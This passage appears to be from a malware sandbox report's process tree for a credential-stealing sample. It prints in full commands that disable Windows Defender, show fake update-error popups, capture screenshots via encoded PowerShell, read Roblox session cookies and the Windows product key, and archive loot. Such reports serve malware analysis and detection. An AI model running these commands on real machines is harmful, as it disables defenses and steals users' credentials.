  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1524
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3480
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "start bound.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1992
    - - C:\Users\Admin\AppData\Local\Temp\bound.exe
        
        bound.exe
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:4392
      - C:\Users\Admin\AppData\Local\Temp\pjomlu.exe
        
        "C:\Users\Admin\AppData\Local\Temp\pjomlu.exe"
        6⤵
        Executes dropped EXE
        
        PID:4948
        
        C:\Users\Admin\AppData\Local\Temp\pjomlu.exe
        
        "C:\Users\Admin\AppData\Local\Temp\pjomlu.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:528
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\pjomlu.exe'"
        8⤵
        
        PID:2956
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\pjomlu.exe'
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5716
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        8⤵
        
        PID:4680
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3940
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Window recent update failed. Hang on it will retry in few minutes', 0, 'Error', 32+16);close()""
        8⤵
        
        PID:524
        
        C:\Windows\system32\mshta.exe
        
        mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Window recent update failed. Hang on it will retry in few minutes', 0, 'Error', 32+16);close()"
        9⤵
        
        PID:5424
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
        8⤵
        
        PID:1496
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2216
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        8⤵
        
        PID:2740
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        9⤵
        Enumerates processes with tasklist
        
        PID:5736
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        8⤵
        
        PID:5004
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        9⤵
        Enumerates processes with tasklist
        
        PID:4992
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        8⤵
        
        PID:2236
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        9⤵
        
        PID:6436
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        8⤵
        Clipboard Data
        
        PID:4420
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        9⤵
        Clipboard Data
        
        PID:6460
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        8⤵
        
        PID:2904
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        9⤵
        Enumerates processes with tasklist
        
        PID:6712
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        8⤵
        
        PID:4876
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        9⤵
        
        PID:6572
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
        8⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:4740
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        9⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:6592
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        8⤵
        
        PID:4344
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        9⤵
        Gathers system information
        
        PID:6452
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
        8⤵
        
        PID:64
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        9⤵
        
        PID:6484
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\izansm4m\izansm4m.cmdline"
        10⤵
        
        PID:7044
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES42C1.tmp" "c:\Users\Admin\AppData\Local\Temp\izansm4m\CSC4F4E98125FA841DD8C3EB2BB8104181.TMP"
        11⤵
        
        PID:7120
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        8⤵
        
        PID:6796
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        9⤵
        
        PID:6924
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        8⤵
        
        PID:6952
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        9⤵
        
        PID:7016
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        8⤵
        
        PID:7068
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        9⤵
        
        PID:7148
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        8⤵
        
        PID:6192
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        9⤵
        
        PID:6200
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        8⤵
        
        PID:6232
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        9⤵
        
        PID:5444
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2628"
        8⤵
        
        PID:6352
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2628
        9⤵
        Kills process with taskkill
        
        PID:6736
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5480"
        8⤵
        
        PID:4696
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        9⤵
        
        PID:6572
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5480
        9⤵
        Kills process with taskkill
        
        PID:4048
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3052"
        8⤵
        
        PID:3360
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3052
        9⤵
        Kills process with taskkill
        
        PID:6820
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3188"
        8⤵
        
        PID:6840
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3188
        9⤵
        Kills process with taskkill
        
        PID:2996
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5744"
        8⤵
        
        PID:6548
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5744
        9⤵
        Kills process with taskkill
        
        PID:6500
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5912"
        8⤵
        
        PID:6936
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5912
        9⤵
        Kills process with taskkill
        
        PID:3988
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5332"
        8⤵
        
        PID:7012
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5332
        9⤵
        Kills process with taskkill
        
        PID:6976
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 6020"
        8⤵
        
        PID:7116
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 6020
        9⤵
        Kills process with taskkill
        
        PID:1920
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3956"
        8⤵
        
        PID:7076
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3956
        9⤵
        Kills process with taskkill
        
        PID:6216
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        8⤵
        
        PID:6588
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6320
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "getmac"
        8⤵
        
        PID:6412
        
        C:\Windows\system32\getmac.exe
        
        getmac
        9⤵
        
        PID:6172
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        8⤵
        
        PID:2216
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        9⤵
        
        PID:6564
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI49482\rar.exe a -r -hp"newgen" "C:\Users\Admin\AppData\Local\Temp\VbztR.zip" *"
        8⤵
        
        PID:5668
        
        C:\Users\Admin\AppData\Local\Temp\_MEI49482\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI49482\rar.exe a -r -hp"newgen" "C:\Users\Admin\AppData\Local\Temp\VbztR.zip" *
        9⤵
        Executes dropped EXE
        
        PID:5204
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
        8⤵
        
        PID:3536
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        9⤵
        
        PID:1444
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
        8⤵
        
        PID:6640
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        9⤵
        
        PID:2340
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        8⤵
        
        PID:2740
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        9⤵
        
        PID:452
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
        8⤵
        
        PID:5068
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6440
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        8⤵
        
        PID:6364
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        9⤵
        Detects videocard installed
        
        PID:5572
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
        8⤵
        
        PID:6836
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        9⤵
        
        PID:6932
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('windows update failed. hang on it will retry in a bit', 0, 'windows', 32+16);close()""
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5016
    - - C:\Windows\system32\mshta.exe
        
        mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('windows update failed. hang on it will retry in a bit', 0, 'windows', 32+16);close()"
        5⤵
        
        PID:1420
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‏ ‍.scr'"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1776
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‏ ‍.scr'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2560
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:436
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4304
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4944
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2144
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
      4⤵
      Suspicious use of WriteProcessMemory
